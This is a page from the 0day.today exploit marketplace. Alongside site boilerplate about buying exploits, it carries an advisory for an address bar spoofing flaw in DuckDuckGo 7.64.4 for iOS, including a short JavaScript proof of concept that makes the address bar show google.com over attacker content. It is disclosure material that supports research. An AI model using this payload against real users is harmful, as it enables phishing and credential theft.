0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
DuckDuckGo 7.64.4 Address Bar Spoofing Vulnerability
#Vulnerability: Address Bar Spoofing Vulnerability Product: DuckDuckGo Discovered by: Rafay Baloch and Muhammad Samak #Version: 7.64.4 #Impact: Moderate #Company: Cyber Citadel #Website: https://www.cybercitadel.com *Description* DuckDuckGo browser for iOS was prone to an "Address Bar Spoofing" vulnerability due to mishandling of javaScript's window.open function which is used to open a secondary browser window. This could be exploited by tricking the users into supplying senstive information such as username/passwords etc due to the fact that the address bar would display a legitimate URL, however it would be hosted on the attacker's page. *Proof of Concept (POC)* Following is the POC that could be used to reproduce the issue: <script> function spoof(){ location="https://www.google.com/csi?random="+Math.random(); document.body.innerHTML='This is not Google!';("This is not google.com </h1>");} </script> <input type="button" value="Run" onclick="setInterval("spoof()",20);"/> *Impact* The issue could be abused to carry out more effective phishing attacks against it's users. # 0day.today [2024-11-15] #